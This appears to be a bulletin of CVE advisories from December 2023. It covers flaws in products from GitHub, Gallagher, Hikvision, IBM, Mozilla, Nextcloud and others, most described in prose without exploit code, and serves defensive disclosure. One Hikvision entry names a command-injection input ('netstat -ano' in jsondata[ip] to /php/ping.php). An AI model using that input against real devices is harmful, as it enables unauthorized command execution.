efacec -- uc_500eAn attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application.2023-12-206.3CVE-2023-50703
ics-cert@hq.dhs.gov
efacec -- uc_500eAn attacker could create malicious requests to obtain sensitive information about the web server.2023-12-205.3CVE-2023-50705
ics-cert@hq.dhs.gov
efacec -- uc_500eAn attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.2023-12-204.3CVE-2023-50704
ics-cert@hq.dhs.gov
efacec -- uc_500eA user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens.2023-12-204.1CVE-2023-50706
ics-cert@hq.dhs.gov
enterprise_server -- enterprise_serverImproper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the "Get a check run" API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7 3.10.4, and 3.11.0.2023-12-215.3CVE-2023-46646
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server -- enterprise_serverAn incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-214.9CVE-2023-51379
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server -- enterprise_serverImproper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-216.5CVE-2023-6804
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
enterprise_server -- enterprise_serverA race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-215.8CVE-2023-6803
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
ethex -- contractsA vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271.2023-12-194.3CVE-2019-25157
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
gallagher -- command_centreClient-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior.2023-12-185.4CVE-2023-23570
disclosures@gallagher.com
gallagher -- command_centre_diagnostics_serviceA reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).2023-12-185.5CVE-2023-46686
disclosures@gallagher.com
gallagher -- command_centre_serverIncorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.2023-12-184.3CVE-2023-23576
disclosures@gallagher.com
gallagher -- command_centre_serverAn observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior.2023-12-184.3CVE-2023-23584
disclosures@gallagher.com
gallagher -- controller_7000Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)).2023-12-186.8CVE-2023-6355
disclosures@gallagher.com
getsentry -- symbolicatorSymbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator's API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`.2023-12-224.3CVE-2023-51451
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
github -- enterprise_serverA path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-216.8CVE-2023-46645
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
github -- enterprise_serverA race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-216.3CVE-2023-46649
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
product-cna@github.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.2023-12-156.5CVE-2023-6051
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI.2023-12-155.7CVE-2023-5512
cve@gitlab.com
cve@gitlab.com
gitlab -- gitlabAn issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.2023-12-154.3CVE-2023-5061
cve@gitlab.com
cve@gitlab.com
gradio -- gradioGradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0.2023-12-225.6CVE-2023-51449
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
grails -- grailsGrails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0.2023-12-216.5CVE-2023-46131
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
hcl_software -- hcl_bigfix_mobile/modern_client_managementDue to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage.2023-12-216.6CVE-2023-28025
psirt@hcl.com
hcl_software -- hcl_launchHCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure.2023-12-214.3CVE-2023-45700
psirt@hcl.com
hcltech -- connectionsHCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data.2023-12-156.5CVE-2023-28022
psirt@hcl.com
hikvision -- intercom_broadcast_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability.2023-12-176.5CVE-2023-6894
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hikvision -- intercom_broadcasting_systemA vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.2023-12-176.3CVE-2023-6895
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hitachi_energy -- rtu500_series_cmuVulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in buffer overflow and as final consequence to a reboot of an RTU500 CMU.2023-12-195.9CVE-2023-6711
cybersecurity@hitachienergy.com
home_assistant -- home_assistantHome Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.2023-12-154.3CVE-2023-50715
security-advisories@github.com
security-advisories@github.com
ibm -- aixIBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963.2023-12-226.2CVE-2023-45165
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- aixIBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970.2023-12-196.2CVE-2023-45172
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- cloud_pak_for_business_automationIBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805.2023-12-184.9CVE-2023-40691
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- db2_mirror_for_iIBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.2023-12-185.3CVE-2023-47741
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- informix_jdbcIBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116.2023-12-206.3CVE-2023-35895
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- qradar_siemIBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372.2023-12-194.9CVE-2023-47146
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197.2023-12-205.3CVE-2023-47703
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522.2023-12-205.4CVE-2023-47707
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- security_guardium_key_lifecycle_managerIBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228.2023-12-204.3CVE-2023-47705
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- urbancode_deployAn IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.2023-12-206.2CVE-2023-42012
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510.2023-12-205.3CVE-2023-42013
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799.2023-12-205.3CVE-2023-47161
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- urbancode_deployIBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512.2023-12-194.3CVE-2023-42015
psirt@us.ibm.com
psirt@us.ibm.com
idemia -- multiple_products
 
When handling contactless cards, usage of a specific function to get additional information from the card which doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device2023-12-156.8CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan -- infinispanA flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-186.5CVE-2023-3628
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
infinispan -- infinispanA flaw was found in Infinispan's REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.2023-12-184.3CVE-2023-3629
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
infinispan -- infinispan-serverA flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.2023-12-184.4CVE-2023-5236
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
instipod -- duouniversalkeycloakauthenticatorAn information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. An user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability.2023-12-234.5CVE-2023-49594
talos-cna@cisco.com
talos-cna@cisco.com
insyde -- insydeh2oTOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 version before 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process.2023-12-164.7CVE-2022-24351
cve@mitre.org
cve@mitre.org
iscute -- cute_http_file_serverCross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page.2023-12-205.4CVE-2023-50639
cve@mitre.org
i̇stanbul_soft_informatics_and_consultancy_limited_company -- softomi_geli?mi?_c2c_pazaryeri_yaz?l?m?Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ?stanbul Soft Informatics and Consultancy Limited Company Softomi Geli?mi? C2C Pazaryeri Yaz?l?m? allows Reflected XSS. This issue affects Softomi Geli?mi? C2C Pazaryeri Yaz?l?m?: before 12122023.2023-12-216.1CVE-2023-6122
iletisim@usom.gov.tr
jetbrains -- intellij_ideaIn JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration2023-12-216.3CVE-2023-51655
cve@jetbrains.com
jetbrains -- youtrackIn JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed2023-12-154.3CVE-2023-50871
cve@jetbrains.com
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database.2023-12-156.5CVE-2023-48395
twcert@cert.org.tw
kaifa -- webitr_attendance_systemKaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message.2023-12-154.3CVE-2023-48393
twcert@cert.org.tw
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'adults' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49269
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_in_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49270
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'check_out_date' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49271
help@fluidattacks.com
help@fluidattacks.com
kashipara_group -- hotel_managementHotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The 'children' parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application's response.2023-12-205.4CVE-2023-49272
help@fluidattacks.com
help@fluidattacks.com
kodcloud -- kodexplorerReflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php.2023-12-196.1CVE-2023-49489
cve@mitre.org
libtiff -- libtiffAn issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.2023-12-185.5CVE-2023-6228
secalert@redhat.com
secalert@redhat.com
lightxun -- iptv_gatewayA vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579.2023-12-214.3CVE-2023-7026
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
linux -- kernelA null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.2023-12-214.4CVE-2023-7042
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
m-files_corporation -- m-files_serverA vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests.2023-12-206.5CVE-2023-6910
security@m-files.com
microsoft -- edge_chromiumMicrosoft Edge (Chromium-based) Security Feature Bypass Vulnerability2023-12-154.3CVE-2023-36878
secure@microsoft.com
microsoft -- windows
 
Windows Local Session Manager (LSM) Denial of Service Vulnerability2023-12-206.5CVE-2022-44684
secure@microsoft.com
microweber -- microweberBusiness Logic Errors in GitHub repository microweber/microweber prior to 2.0.2023-12-154.3CVE-2023-6832
security@huntr.dev
security@huntr.dev
moxa -- iologik_e1200_seriesA weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization.2023-12-236.5CVE-2023-5962
psirt@moxa.com
mozilla -- firefoxA `&lt;dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6869
security@mozilla.org
security@mozilla.org
mozilla -- firefoxBrowser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121.2023-12-196.5CVE-2023-6872
security@mozilla.org
security@mozilla.org
mozilla -- firefoxMultiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6135
security@mozilla.org
security@mozilla.org
mozilla -- firefoxIn some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6868
security@mozilla.org
security@mozilla.org
mozilla -- firefoxApplications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6870
security@mozilla.org
security@mozilla.org
mozilla -- firefoxUnder certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121.2023-12-194.3CVE-2023-6871
security@mozilla.org
security@mozilla.org
mozilla -- firefox/firefox_esr`EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.5CVE-2023-6865
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- firefox/firefox_esrThe timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121.2023-12-196.1CVE-2023-6867
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsThe `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-196.5CVE-2023-6860
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- multiple_productsWhen resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121.2023-12-195.3CVE-2023-6857
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- thunderbirdThe signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6.2023-12-194.3CVE-2023-50761
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla -- thunderbirdWhen processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6.2023-12-194.3CVE-2023-50762
security@mozilla.org
security@mozilla.org
security@mozilla.org
mr-corner -- amazing_little_pollStored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the "lp_admin.php" file in the "question" and "item" parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading.2023-12-204.6CVE-2023-6769
cve-coordination@incibe.es
netapp -- ontapONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.2023-12-154.6CVE-2023-27317
security-alert@netapp.com
netapp -- ontap_mediatorONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API.2023-12-215.3CVE-2023-27319
security-alert@netapp.com
nextcloud -- security-advisoriesNextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.2023-12-225.4CVE-2023-49791
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesNextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available.2023-12-225.3CVE-2023-49792
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesThe Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available.2023-12-224.3CVE-2023-49790
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openbsd -- opensshIn ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.2023-12-185.5CVE-2023-51384
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
pedroetb -- tts-apiA vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability.2023-12-195.5CVE-2019-25158
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability.2023-12-225.5CVE-2023-7054
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability.2023-12-214.3CVE-2023-7051
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
